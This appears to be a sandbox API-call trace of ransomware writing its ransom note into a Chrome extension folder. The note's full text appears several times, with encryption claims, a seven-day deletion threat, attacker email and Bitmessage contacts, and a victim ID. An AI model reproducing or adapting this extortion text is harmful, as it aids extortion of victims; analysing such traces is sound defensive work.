;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.334] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.334] CloseHandle (hObject=0x294) returned 1 [0273.334] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\#readme_eman#.rtf")) returned 0xffffffff [0273.334] GetLastError () returned 0x2 [0273.334] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\he\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.335] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 